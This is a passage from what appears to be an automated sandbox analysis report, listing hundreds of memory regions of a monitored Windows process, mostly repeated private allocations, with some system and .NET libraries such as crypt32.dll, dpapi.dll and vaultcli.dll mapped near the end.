end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2548 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2549 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2550 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2551 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2552 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2553 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2554 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2555 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2556 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2557 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2558 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2559 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2560 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2561 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2562 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2563 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2564 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2565 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2566 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2567 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2568 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2569 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2570 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2571 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2572 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2573 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2574 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2575 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2576 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2577 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2578 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2579 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2580 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2581 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2582 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2583 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2584 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2585 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2586 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2587 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2588 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2589 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2590 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2591 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2592 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2593 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2594 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2595 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2596 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2597 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2598 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2599 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2600 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2601 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2602 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2603 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2604 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2605 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2606 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2607 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2608 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2609 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2610 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2611 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2612 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2613 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2614 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2615 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2616 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2617 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2618 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2619 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2620 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2621 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2622 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2623 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2624 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2625 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2626 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2627 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2628 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2629 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2630 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2631 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2632 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2633 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2634 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2635 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2636 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2637 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2638 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2639 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2640 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2641 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2642 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2643 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2644 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2645 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2646 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2647 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2648 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2649 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2650 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2651 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2652 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2653 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2654 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2655 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2656 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2657 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2658 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2659 start_va = 0x51a0000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 2660 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2661 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2662 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2663 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2664 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2665 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2666 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2667 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2668 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2669 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2670 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2671 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2672 start_va = 0x4810000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 2673 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2674 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2675 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2676 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2677 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2678 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2679 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2680 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2681 start_va = 0x5190000 end_va = 0x519ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 2682 start_va = 0x5190000 end_va = 0x51f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 2683 start_va = 0x5110000 end_va = 0x511ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2684 start_va = 0x5110000 end_va = 0x511ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2685 start_va = 0x5110000 end_va = 0x511ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 2686 start_va = 0x5120000 end_va = 0x512ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 2687 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2688 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2689 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2690 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2691 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2692 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2693 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2694 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2695 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2696 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2697 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2698 start_va = 0x65710000 end_va = 0x657d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Security\\754ca70e68140abcdb8476cff64c4169\\System.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.security\\754ca70e68140abcdb8476cff64c4169\\system.security.ni.dll") Region: id = 2699 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2700 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2701 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 2702 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2703 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2704 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2705 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2706 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2707 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2708 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2709 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2710 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2711 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2712 start_va = 0x5130000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2713 start_va = 0x6fed0000 end_va = 0x6ff09fff monitored = 0 entry_point = 0x6fee9be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 2714 start_va = 0x6fe00000 end_va = 0x6fec7fff monitored = 0 entry_point = 0x6fe6ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 2715 start_va = 0x5130000 end_va = 0x5133fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2716 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2717 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2718 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2719 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2720 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2721 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2722 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2723 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2724 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2725 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2726 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2727 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2728 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2729 start_va = 0x5150000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 2730 start_va = 0x5160000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2731 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2732 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2733 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2734 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2735 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2736 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2737 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2738 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2739 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2740 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2741 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2742 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2743 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2744 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2745 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2746 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 2747 start_va = 0x5140000 end_va = 0x514ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 